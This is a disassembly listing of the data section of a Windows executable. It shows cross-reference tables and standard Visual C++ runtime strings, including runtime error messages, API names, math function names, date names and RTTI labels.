dword_41D120 dd 380CBDh ; DATA XREF: J8@F_7_S:0040CB08�r
dword_41D124 dd 380CD3h ; DATA XREF: sub_40C33C+2D�r
; sub_40C33C+11C�r
dword_41D128 dd 380D1Eh ; DATA XREF: sub_40C33C+191�r
dword_41D12C dd 380D63h ; DATA XREF: sub_40BF57+30�r
; sub_40BF57+144�r ...
dword_41D130 dd 380DC4h ; DATA XREF: sub_40BF57+294�r
; sub_40BF57+365�r
dword_41D134 dd 380E24h ; DATA XREF: sub_40AF0D+B�r
dword_41D138 dd 380E59h ; DATA XREF: sub_40AF0D:loc_40AF87�r
; sub_40BF57+216�r ...
dword_41D13C dd 380E90h ; DATA XREF: sub_40AF0D+CC�r
dword_41D140 dd 380EADh ; DATA XREF: sub_40AF0D:loc_40AFEB�r
dword_41D144 dd 380F22h ; DATA XREF: sub_40AF0D+10F�r
; sub_40AF0D+126�r
dword_41D148 dd 380F64h ; DATA XREF: sub_4087E0+12B�r
; sub_4087E0+1C7�r ...
dword_41D14C dd 380FBCh ; DATA XREF: sub_4087E0+1B5�r
; sub_409AB4+169�r
dword_41D150 dd 380FFAh ; DATA XREF: sub_4087E0+21F�r
dword_41D154 dd 381014h ; DATA XREF: sub_405E64+27�r
; sub_40DA6D+134�r ...
dword_41D158 dd 381041h ; DATA XREF: sub_405E64+77�r
; sub_405F14+52�r
dword_41D15C dd 381091h ; DATA XREF: sub_405B50+22F�r
dword_41D160 dd 3810C5h ; DATA XREF: sub_405A83+11�r
dword_41D164 dd 381136h ; DATA XREF: sub_405A83+47�r
dword_41D168 dd 38116Bh ; DATA XREF: sub_4059F7+28�r
; sub_40815B+28�r ...
dword_41D16C dd 38119Ah ; DATA XREF: sub_40591F+D�r
; sub_4081AD+28�r ...
dword_41D170 dd 3811C4h ; DATA XREF: sub_4058CA+1�r
; sub_40DFD3+62�r
dword_41D174 dd 3811EEh ; DATA XREF: sub_40531A+78�r
; sub_40CB14+AB�r
dword_41D178 dd 38121Eh ; DATA XREF: sub_405229+2B�r
; sub_4054D6+85�r
dword_41D17C dd 38124Ch ; DATA XREF: sub_4051FF+23�r
; sub_4054D6+58�r
dword_41D180 dd 38128Dh ; DATA XREF: sub_4051F6�r
; sub_4054D6:loc_405575�r
dword_41D184 dd 3812B7h ; DATA XREF: sub_405127+7�r
; sub_405193+7�r ...
dword_41D188 dd 3812E1h ; DATA XREF: sub_404A44+27�r
dword_41D18C dd 3812F2h ; DATA XREF: sub_404A44+4A�r
dd 38130Ah
dword_41D194 dd 381337h ; DATA XREF: sub_40B08A+41�r
dword_41D198 dd 77EB9A84h ; DATA XREF: sub_40468E+D9�r
; sub_40AA15+14�r ...
dword_41D19C dd 381357h ; DATA XREF: sub_40468E+CE�r
; sub_40B18A+5�r ...
dword_41D1A0 dd 381383h ; DATA XREF: sub_40B08A+35�r
dword_41D1A4 dd 3813B5h ; DATA XREF: J8@F_7_S:loc_404045�r
dword_41D1A8 dd 3813CEh ; DATA XREF: J8@F_7_S:00403F4C�r
; sub_4087E0+15�r
dword_41D1AC dd 3813F1h ; DATA XREF: sub_4041BB+40�r
; sub_40F846+222�r
dword_41D1B0 dd 38146Dh ; DATA XREF: sub_413976�r
dword_41D1B4 dd 3814C0h ; DATA XREF: sub_404816+24�r
; sub_404ABE+56�r ...
dword_41D1B8 dd 3814ECh ; DATA XREF: sub_4049A0+84�r
; sub_404C69+95�r ...
dword_41D1BC dd 38151Ch ; DATA XREF: sub_4049A0+59�r
; sub_404C69+76�r ...
dd 0
dd 224C0h, 0
dd 8000000Bh, 8000001Fh, 80000018h, 80000029h, 8000004Bh
dd 0
dword_41D1E4 dd 22448h ; DATA XREF: sub_4190BD+148�r
; J8@F_7_S:0041BB08�r
dd 0
dword_41D1EC dd 38154Bh ; DATA XREF: sub_41748B+30�r
dword_41D1F0 dd 381592h ; DATA XREF: sub_418C40+67�r
dword_41D1F4 dd 3815B4h ; DATA XREF: sub_418C40+C�r
dword_41D1F8 dd 3815DDh ; DATA XREF: sub_418C40+B1�r
dword_41D1FC dd 38160Ah ; DATA XREF: sub_418C40+94�r
dword_41D200 dd 38169Ah ; DATA XREF: sub_418AEB+D�r
dword_41D204 dd 3816BFh ; DATA XREF: sub_418C40+BB�r
dword_41D208 dd 3816EAh ; DATA XREF: sub_418C40+A5�r
dword_41D20C dd 381738h ; DATA XREF: sub_418C40+4A�r
dd 0
dword_41D214 dd 22490h ; DATA XREF: J8@F_7_S:0041BA10�r
dword_41D218 dd 2247Ch ; DATA XREF: J8@F_7_S:0041B9A2�r
dword_41D21C dd 224A4h ; DATA XREF: J8@F_7_S:0041B95E�r
dd 0
dword_41D224 dd 80000003h ; DATA XREF: sub_41397C+98�r
; sub_417F01+117�r ...
dword_41D228 dd 80000013h ; DATA XREF: sub_4172CC+7D�r
; sub_417361+116�r ...
dword_41D22C dd 80000065h ; DATA XREF: sub_418B1F+FA�r
dword_41D230 dd 8000000Dh ; DATA XREF: sub_418B1F+10C�r
dword_41D234 dd 80000001h ; DATA XREF: sub_41835D+1A�r
dword_41D238 dd 80000006h ; DATA XREF: sub_418FC6+34�r
dword_41D23C dd 80000034h ; DATA XREF: sub_41802F+7B�r
dword_41D240 dd 80000004h ; DATA XREF: sub_41397C+78�r
; sub_41802F+DF�r ...
dword_41D244 dd 80000074h ; DATA XREF: J8@F_7_S:loc_41C056�r
dword_41D248 dd 80000005h ; DATA XREF: sub_418552+4C9�r
dword_41D24C dd 80000014h ; DATA XREF: sub_41B3D0+F7�r
dword_41D250 dd 80000015h ; DATA XREF: sub_41B5D2+58�r
dword_41D254 dd 8000000Fh ; DATA XREF: sub_41B3D0+131�r
; sub_41B3D0+147�r ...
dword_41D258 dd 80000012h ; DATA XREF: sub_41397C+8F�r
; sub_41B5D2+F4�r
dword_41D25C dd 80000011h ; DATA XREF: sub_41B3D0+11C�r
; sub_41B5D2+12C�r
dword_41D260 dd 8000000Ch ; DATA XREF: sub_41A9DE+3C�r
; sub_41A9DE+76F�r ...
dd 8000000Bh
dword_41D268 dd 8000000Ah ; DATA XREF: sub_41397C+54�r
dword_41D26C dd 80000002h ; DATA XREF: sub_418B1F+D7�r
; sub_41B5D2+9E�r
dword_41D270 dd 80000010h ; DATA XREF: sub_417F01+51�r
; sub_418552+85�r
dword_41D274 dd 80000073h ; DATA XREF: J8@F_7_S:0041BF9C�r
dword_41D278 dd 80000009h ; DATA XREF: sub_41397C+34�r
; sub_41802F+C7�r ...
dword_41D27C dd 80000017h ; DATA XREF: sub_41397C+20�r
; sub_41802F+2F�r ...
dword_41D280 dd 80000033h ; DATA XREF: sub_418552+4F9�r
align 8
dword_41D288 dd 0 ; DATA XREF: sub_407979+49�o
dd offset loc_41C370
dd offset loc_41C38D
dd offset loc_41C3AA
dd offset loc_41C3C6
dd offset loc_41C3E2
dd offset loc_41C3FE
dd offset loc_41C41A
dd offset loc_41C436
dd offset loc_41C444
dd offset loc_41C460
dd offset loc_41C47C
dword_41D2B8 dd 0 ; DATA XREF: sub_407979+50�o
dword_41D2BC dd 0 ; DATA XREF: sub_407979+2D�o
dd offset sub_402DB6
dd offset sub_404E03
dd offset sub_40808A
dd offset sub_40A6DB
dd offset sub_40F839
dd offset sub_40B18A
dword_41D2D8 dd 0 ; DATA XREF: sub_407979+28�o
dword_41D2DC dd 0 ; DATA XREF: sub_407A0B+73�o
dd offset sub_41144A
dd offset sub_40813B
dword_41D2E8 dd 0 ; DATA XREF: sub_407A0B:loc_407A79�o
dword_41D2EC dd 0 ; DATA XREF: sub_407A0B+83�o
dd offset sub_40B1AB
dword_41D2F4 dd 3 dup(0) ; DATA XREF: sub_407A0B:loc_407A89�o
dword_41D300 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 420F64h
; DATA XREF: J8@F_7_S:00423000�o
; J8@F_7_S:00423004�o ...
off_41D314 dd offset loc_401043 ; DATA XREF: sub_401038�o
; J8@F_7_S:00401046�o ...
dd offset sub_402CE0
dd offset dword_420F18
off_41D320 dd offset loc_4010C5 ; DATA XREF: sub_401065+20�o
; sub_40109A+A�o ...
dd offset sub_4010B7
dd offset dword_420EC8
off_41D32C dd offset loc_4010EC ; DATA XREF: J8@F_7_S:loc_4010E1�o
; J8@F_7_S:004010EF�o ...
dd offset sub_4010B7
dd offset dword_420D88
off_41D338 dd offset loc_402658 ; DATA XREF: sub_40264D�o
; J8@F_7_S:0040265B�o ...
dd offset sub_4010B7
aStringTooLong db 'string too long',0
aInvalidStringP db 'invalid string position',0
dd offset dword_420DD8
off_41D36C dd offset loc_402CED ; DATA XREF: sub_402BFB+A�o
; sub_402C0C+9�o ...
dd offset sub_402CE0
aUnknownExcepti db 'Unknown exception',0
align 4
dd offset dword_420DEC
off_41D38C dd offset loc_402FFB ; DATA XREF: sub_402FED+1�o
; J8@F_7_S:off_423008�o ...
oword_41D390 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: sub_403DA0+E3�r
; sub_403DA0+10A�r
oword_41D3A0 xmmword 4330000000000000433h ; DATA XREF: sub_403DA0+46�r
oword_41D3B0 xmmword 0 ; DATA XREF: sub_403DA0:loc_403EA1�r
oword_41D3C0 xmmword 7FFh ; DATA XREF: sub_403DA0+5F�r
dbl_41D3D0 db 0, 0, 0, 0, 0, 0, 0, 80h ; DATA XREF: sub_403DA0:loc_403E9A�r
dword_41D3D8 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_4041BB+E�o
dd 3, 19930520h, 2 dup(0)
off_41D3F8 dd offset dword_425AA0 ; DATA XREF: sub_40468E+D4�o
dd offset dword_425AF8
dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
byte_41D480 db 3Dh, 0 ; DATA XREF: J8@F_7_S:0041EB90�o
word_41D482 dw 0 ; DATA XREF: sub_40AB84+1B�o
; J8@F_7_S:0041EB70�o ...
aEncodepointer db 'EncodePointer',0 ; DATA XREF: sub_405127+43�o
; sub_405266+2E�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_405127:loc_40515B�o
; sub_405193:loc_4051C7�o ...
align 4
aDecodepointer db 'DecodePointer',0 ; DATA XREF: sub_405193+43�o
; sub_405266+42�o
align 4
aFlsfree db 'FlsFree',0 ; DATA XREF: sub_4054D6+44�o
aFlssetvalue db 'FlsSetValue',0 ; DATA XREF: sub_4054D6+37�o
aFlsgetvalue db 'FlsGetValue',0 ; DATA XREF: sub_4054D6+2A�o
dword_41D4D4 dd 41736C46h ; DATA XREF: sub_4054D6+22�o
byte_41D4D8 db 6Ch ; DATA XREF: sub_4069D7+177�r
db 6Ch, 6Fh, 63h
align 10h
aNull: ; DATA XREF: J8@F_7_S:off_423928�o
unicode 0, <(null)>,0
align 10h
aNull_0 db '(null)',0 ; DATA XREF: J8@F_7_S:off_423924�o
align 4
byte_41D4F8 db 6 ; DATA XREF: sub_4069D7:loc_406B60�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38202800h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707800h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_407881+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_407881�o
aCcs db 'ccs=',0 ; DATA XREF: sub_4081FF+1CC�o
align 4
aUtf8 db 'UTF-8',0 ; DATA XREF: sub_4081FF+1E0�o
align 10h
aUtf16le db 'UTF-16LE',0 ; DATA XREF: sub_4081FF:loc_4083FC�o
align 4
aUnicode db 'UNICODE',0 ; DATA XREF: sub_4081FF:loc_408419�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6034AnApplica db 'R6034',0Dh,0Ah
db 'An application has made an attempt to load the C runtime library '
db 'incorrectly.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 8
aR6033AttemptTo db 'R6033',0Dh,0Ah
db '- Attempt to use MSIL code from this assembly during native code '
db 'initialization',0Ah
db 'This indicates a bug in your application. It is most likely the r'
db 'esult of calling an MSIL-compiled (/clr) function from a native c'
db 'onstructor or from DllMain.',0Dh,0Ah,0
align 10h
aR6032NotEnough db 'R6032',0Dh,0Ah
db '- not enough space for locale information',0Dh,0Ah,0
align 8
aR6031AttemptTo db 'R6031',0Dh,0Ah
db '- Attempt to initialize the CRT more than once.',0Ah
db 'This indicates a bug in your application.',0Dh,0Ah,0
align 4
aR6030CrtNotIni db 'R6030',0Dh,0Ah
db '- CRT not initialized',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: J8@F_7_S:off_423C04�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_409AB4+157�o
align 10h
asc_41DB10 db 0Ah ; DATA XREF: sub_409AB4:loc_409BC4�o
db 0Ah,0
align 4
a___ db '...',0 ; DATA XREF: sub_409AB4+E8�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_409AB4+A3�o
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_409AB4+5B�o
db 0Ah
db 'Program: ',0
align 4
dd 2 dup(0)
dd 7FF00000h, 0
dd 0FFF00000h, 0
dd 7FE00000h, 0
dd 200000h, 3 dup(0)
dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h, 0FFC00000h
dd 0
dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h, 8DA24260h
dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
dword_41DBB8 dd 6E6174h ; DATA XREF: sub_40A42B:loc_40A663�o
dword_41DBBC dd 736F63h ; DATA XREF: sub_40A42B:loc_40A65A�o
dword_41DBC0 dd 6E6973h ; DATA XREF: sub_40A42B:loc_40A651�o
aModf db 'modf',0 ; DATA XREF: sub_40A42B:loc_40A645�o
align 4
aFloor db 'floor',0 ; DATA XREF: sub_40A42B:loc_40A639�o
align 4
aCeil db 'ceil',0 ; DATA XREF: sub_40A42B:loc_40A630�o
align 4
aAtan db 'atan',0 ; DATA XREF: sub_40A42B:loc_40A627�o
align 4
aExp10 db 'exp10',0 ; DATA XREF: sub_40A42B+1BF�o
align 10h
dbl_41DBF0 dq 1.0 ; DATA XREF: sub_40A6EF+6D�r
aAcos db 'acos',0 ; DATA XREF: sub_40A42B:loc_40A5AE�o
align 10h
aAsin db 'asin',0 ; DATA XREF: sub_40A42B:loc_40A5A5�o
align 4
aLog db 'log',0 ; DATA XREF: sub_40A42B:loc_40A568�o
; sub_40A42B+149�o ...
aLog10 db 'log10',0 ; DATA XREF: sub_40A42B:loc_40A541�o
; sub_40A42B+131�o ...
align 4
aExp db 'exp',0 ; DATA XREF: sub_40A42B:loc_40A508�o
; sub_40A42B+10D�o ...
aPow db 'pow',0 ; DATA XREF: sub_40A42B:loc_40A4D3�o
; sub_40A42B:loc_40A580�o ...
off_41DC1C dd offset sub_40B3C2 ; DATA XREF: sub_406640+F1�r
; sub_406640+FA�o ...
dd offset dword_420E34
off_41DC24 dd offset loc_40B1DA ; DATA XREF: sub_40B1CF�o
; J8@F_7_S:0040B1DD�o ...
dd offset sub_402CE0
dword_41DC2C dd 20646162h, 65637865h, 6F697470h, 6Eh ; DATA XREF: sub_40BA07+156�o
dword_41DC3C dd 41h dup(0) ; DATA XREF: sub_40BF57+25�o
; sub_40C33C+27�o
asc_41DD40: ; DATA XREF: J8@F_7_S:off_423668�o
; J8@F_7_S:00423E70�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_41DF40 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: J8@F_7_S:00423E74�o
; J8@F_7_S:00423590�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 0
dword_41E148 dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch
dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: J8@F_7_S:00423F1C�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: J8@F_7_S:00423F18�o
align 4
aPm db 'PM',0 ; DATA XREF: J8@F_7_S:00423F14�o
align 4
aAm db 'AM',0 ; DATA XREF: J8@F_7_S:00423F10�o
align 4
aDecember db 'December',0 ; DATA XREF: J8@F_7_S:00423F0C�o
align 4
aNovember db 'November',0 ; DATA XREF: J8@F_7_S:00423F08�o
align 4
aOctober db 'October',0 ; DATA XREF: J8@F_7_S:00423F04�o
aSeptember db 'September',0 ; DATA XREF: J8@F_7_S:00423F00�o
align 4
aAugust db 'August',0 ; DATA XREF: J8@F_7_S:00423EFC�o
align 10h
aJuly db 'July',0 ; DATA XREF: J8@F_7_S:00423EF8�o
align 4
aJune db 'June',0 ; DATA XREF: J8@F_7_S:00423EF4�o
align 10h
aApril db 'April',0 ; DATA XREF: J8@F_7_S:00423EEC�o
align 4
aMarch db 'March',0 ; DATA XREF: J8@F_7_S:00423EE8�o
align 10h
aFebruary db 'February',0 ; DATA XREF: J8@F_7_S:00423EE4�o
align 4
aJanuary db 'January',0 ; DATA XREF: J8@F_7_S:00423EE0�o
aDec db 'Dec',0 ; DATA XREF: J8@F_7_S:00423EDC�o
aNov db 'Nov',0 ; DATA XREF: J8@F_7_S:00423ED8�o
aOct db 'Oct',0 ; DATA XREF: J8@F_7_S:00423ED4�o
aSep db 'Sep',0 ; DATA XREF: J8@F_7_S:00423ED0�o
aAug db 'Aug',0 ; DATA XREF: J8@F_7_S:00423ECC�o
aJul db 'Jul',0 ; DATA XREF: J8@F_7_S:00423EC8�o
aJun db 'Jun',0 ; DATA XREF: J8@F_7_S:00423EC4�o
aMay db 'May',0 ; DATA XREF: J8@F_7_S:00423EC0�o
; J8@F_7_S:00423EF0�o
aApr db 'Apr',0 ; DATA XREF: J8@F_7_S:00423EBC�o
aMar db 'Mar',0 ; DATA XREF: J8@F_7_S:00423EB8�o
aFeb db 'Feb',0 ; DATA XREF: J8@F_7_S:00423EB4�o
aJan db 'Jan',0 ; DATA XREF: J8@F_7_S:00423EB0�o
aSaturday db 'Saturday',0 ; DATA XREF: J8@F_7_S:00423EAC�o
align 10h
aFriday db 'Friday',0 ; DATA XREF: J8@F_7_S:00423EA8�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: J8@F_7_S:00423EA4�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: J8@F_7_S:00423EA0�o
align 10h
aTuesday db 'Tuesday',0 ; DATA XREF: J8@F_7_S:00423E9C�o
aMonday db 'Monday',0 ; DATA XREF: J8@F_7_S:00423E98�o
align 10h
aSunday db 'Sunday',0 ; DATA XREF: J8@F_7_S:00423E94�o
align 4
aSat db 'Sat',0 ; DATA XREF: J8@F_7_S:00423E90�o
aFri db 'Fri',0 ; DATA XREF: J8@F_7_S:00423E8C�o
aThu db 'Thu',0 ; DATA XREF: J8@F_7_S:00423E88�o
aWed db 'Wed',0 ; DATA XREF: J8@F_7_S:00423E84�o
aTue db 'Tue',0 ; DATA XREF: J8@F_7_S:00423E80�o
aMon db 'Mon',0 ; DATA XREF: J8@F_7_S:00423E7C�o
aSun db 'Sun',0 ; DATA XREF: J8@F_7_S:off_423E78�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_40CB14+53�o
align 4
aKernel32_dl_10 db 'kernel32.dll',0 ; DATA XREF: sub_40CB14+44�o
align 4
aCompleteObject db ' Complete Object Locator',27h,0 ; DATA XREF: J8@F_7_S:0041EB84�o
align 4
aClassHierarchy db ' Class Hierarchy Descriptor',27h,0 ; DATA XREF: J8@F_7_S:0041EB80�o
align 4
aBaseClassArray db ' Base Class Array',27h,0 ; DATA XREF: J8@F_7_S:0041EB7C�o
align 4
aBaseClassDescr db ' Base Class Descriptor at (',0 ; DATA XREF: J8@F_7_S:0041EB78�o
aTypeDescriptor db ' Type Descriptor',27h,0 ; DATA XREF: J8@F_7_S:0041EB74�o
align 4
aLocalStaticThr db '`local static thread guard',27h,0 ; DATA XREF: J8@F_7_S:0041ECC0�o
aManagedVectorC db '`managed vector copy constructor iterator',27h,0
; DATA XREF: J8@F_7_S:0041ECBC�o
align 4
aVectorVbaseCop db '`vector vbase copy constructor iterator',27h,0
; DATA XREF: J8@F_7_S:0041ECB8�o
align 10h
aVectorCopyCons db '`vector copy constructor iterator',27h,0 ; DATA XREF: J8@F_7_S:0041ECB4�o
align 4
aDynamicAtexitD db '`dynamic atexit destructor for ',27h,0 ; DATA XREF: J8@F_7_S:0041ECB0�o
align 4
aDynamicInitial db '`dynamic initializer for ',27h,0 ; DATA XREF: J8@F_7_S:0041ECAC�o
align 4
aEhVectorVbaseC db '`eh vector vbase copy constructor iterator',27h,0
; DATA XREF: J8@F_7_S:0041ECA8�o
aEhVectorCopyCo db '`eh vector copy constructor iterator',27h,0
; DATA XREF: J8@F_7_S:0041ECA4�o
align 4
aManagedVectorD db '`managed vector destructor iterator',27h,0
; DATA XREF: J8@F_7_S:0041ECA0�o
align 10h
aManagedVecto_0 db '`managed vector constructor iterator',27h,0
; DATA XREF: J8@F_7_S:0041EC9C�o
align 4
aPlacementDelet db '`placement delete[] closure',27h,0 ; DATA XREF: J8@F_7_S:0041EC98�o
align 4
aPlacementDel_0 db '`placement delete closure',27h,0 ; DATA XREF: J8@F_7_S:0041EC94�o
align 4
aOmniCallsig db '`omni callsig',27h,0 ; DATA XREF: J8@F_7_S:0041EC90�o
align 4
aDelete db ' delete[]',0 ; DATA XREF: J8@F_7_S:0041EC8C�o
align 10h
aNew db ' new[]',0 ; DATA XREF: J8@F_7_S:0041EC88�o
align 4
aLocalVftableCo db '`local vftable constructor closure',27h,0
; DATA XREF: J8@F_7_S:0041EC84�o
aLocalVftable db '`local vftable',27h,0 ; DATA XREF: J8@F_7_S:0041EC80�o
aRtti db '`RTTI',0 ; DATA XREF: J8@F_7_S:0041EC7C�o
align 4
aEh db '`EH',0 ; DATA XREF: J8@F_7_S:0041EC78�o
aUdtReturning db '`udt returning',27h,0 ; DATA XREF: J8@F_7_S:0041EC74�o
aCopyConstructo db '`copy constructor closure',27h,0 ; DATA XREF: J8@F_7_S:0041EC70�o
align 4
aEhVectorVbas_0 db '`eh vector vbase constructor iterator',27h,0
; DATA XREF: J8@F_7_S:0041EC6C�o
align 4
aEhVectorDestru db '`eh vector destructor iterator',27h,0 ; DATA XREF: J8@F_7_S:0041EC68�o
aEhVectorConstr db '`eh vector constructor iterator',27h,0 ; DATA XREF: J8@F_7_S:0041EC64�o
align 10h
aVirtualDisplac db '`virtual displacement map',27h,0 ; DATA XREF: J8@F_7_S:0041EC60�o
align 4
aVectorVbaseCon db '`vector vbase constructor iterator',27h,0
; DATA XREF: J8@F_7_S:0041EC5C�o
aVectorDestruct db '`vector destructor iterator',27h,0 ; DATA XREF: J8@F_7_S:0041EC58�o
